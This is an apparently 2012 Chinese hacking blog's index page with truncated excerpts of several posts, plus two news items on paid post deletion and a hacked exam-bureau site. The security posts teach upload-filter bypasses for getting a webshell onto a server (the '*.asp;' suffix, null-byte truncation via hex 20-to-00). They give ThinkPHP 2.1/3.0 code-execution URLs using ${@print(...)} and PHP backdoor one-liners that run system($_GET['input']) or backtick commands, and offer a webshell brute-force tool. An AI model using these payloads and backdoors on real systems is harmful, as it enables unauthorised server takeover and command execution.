丢掉NC,介绍一种新的上传shell文件的方法

分类:安全 | 2012-08-23 | 撸过 1,255 次
3人扯谈

 今日低调在知道区发帖求助,说后台地址,用户名和密码都有,拿不到shell。不久wbxym和ljb17就分别2种办法上传好了shell。wbxym的方法很简单就是本地上传,修改action的地址为上传页面并且在路径后面加上*.asp;或者加个.也行。就不多做介绍。ljb17的方法是抓包,利用nc上传。
他这里路径有2种办法,第一个办法是和上面一样,添加*.asp;
第二种办法就是截断,直接在路径后面加*.asp空格,然后在16进制下面将20改为00.然后抓包上传。这里要切记如果文件大小有变化,一定要修改包的大小。
今天我介绍一个新办法,无需做多余的工作,咱们直接上传shell。
诀窍就是利用o[......]

继续阅读

ThinkPHP 2.1 漏洞可拿webshell

分类:安全 | 2012-08-23 | 撸过 4,214 次
0人扯谈

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈

晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我

我看了下  系统还是以前的那个thinkphp 2.1的版本

我们来分析下漏洞

官方发布了一个安全补丁

表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。

官方的补丁:

/trunk/ThinkPHP/[......]

继续阅读

删除、恢复wscript.shell

分类:技术 | 2012-08-23 | 撸过 545 次
0人扯谈

由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。

 

恢复wscript.shell

 

建议如果真的为了安全一定要删除这些!

 

下面给出卸载和删除的方法

 

卸载wscript.shell对象,在cmd下或直接运行:

regsvr32 /u %windir%\system32\WSHom.Ocx

 

卸载FSO对象,在cmd下或直接运行:

regsvr32.ex[......]

继续阅读

webshell批量爆破asp.asa工具

分类:工具 | 2012-08-17 | 撸过 1,562 次
0人扯谈

有图有真相

下载地址:webshell批量爆破

网站内鬼删帖 年收数万好处费

分类:新闻 | 2012-08-10 | 撸过 535 次
0人扯谈

近日,百度三名员工因参与“有偿删帖”,被警方以“涉嫌非国家工作人员受贿罪”刑拘。昨日,记者从北京市公安局获悉,警方已针对此事成立专案组,正在进一步调查。有消息称,不止百度一家公司员工被刑拘,“有偿删帖”涉及多家公司。但该说法未获得警方证实。

记者调查发现,大批网络公关公司靠“有偿删帖”牟利,与全国多数知名网站(论坛)工作人员、版主等相互勾结,与有需要的地方政府部门、企业和个人进行灰色交易。

■ 暗访

删帖子2000元 删新闻8000元

网上搜索“删帖”,出现近三千万条相关信息,大多是“专业删除负面信息”的网络公司。

记者发现,多数删帖公司都有独立网站,往往冠名“网络危机公关”。他们以[......]

继续阅读

thinkphp 3.0 爆路径漏洞

分类:安全 | 2012-08-10 | 撸过 1,907 次
0人扯谈

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。

检测有两种情况

1. 可执行命令,这个估计是伪3.0版本?

交大定票

此站到可以执行命令

http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D

可查看版本

https://webshell.cc/index.php/module/action/param1/$%7B@print(phpinfo())%7D

可查看phpinfo信息

2. 不可执行命令,爆路径

https://webshell.cc/apps[......]

继续阅读

广东人事考试局网站被黑 黑客称500元可改成绩

分类:安全 | 2012-08-6 | 撸过 540 次
1人扯谈

南都讯 记者张钊 刘倩 实习生李逸凡

前天晚上,广东省人事考试局网站被黑,“网上咨询”栏目上被黑客用来“做广告”,黑客私下声称,只要考生缴纳500元钱,就能帮助改动成绩。昨日,省人事考试局表示,黑客只是盗取了“网上咨询”栏目的账号和密码,但成绩数据库并未受到攻击,黑客自称能够改动成绩是个骗局。

黑客称汇款就能帮改成绩

昨日,有登录人事考试局网站的考生发现,主页上“网上咨询”栏目,几乎所有网友所提问题,答案都变成一个:“不是黑客精神消失了,而是我们的信仰模糊了”。接着是一个聊天号码,后面注明“帮你解决任何问题”。

几小时后,这些被修改过的提问回答条目,被人事考试局从网站上删除,但黑客通过[......]

继续阅读

关于php后门的编写

分类:安全 | 2012-08-6 | 撸过 766 次
0人扯谈

0x1 原理

1、执行系统命令的函数

proc_open, popen, exec, shell_exec,passthru,system

这里只给出两个例子,其他的可以查看php手册编写

 

system()

<?php
system($_GET['input']);
?>

http://192.168.247.133:81/shell.php?input=dir

 

“``”执行命令

``执行命令等价于shell_exec()函数来执行命令。

<?php
echo`$_GET[input]`;
?>

http://192.168.[......]

继续阅读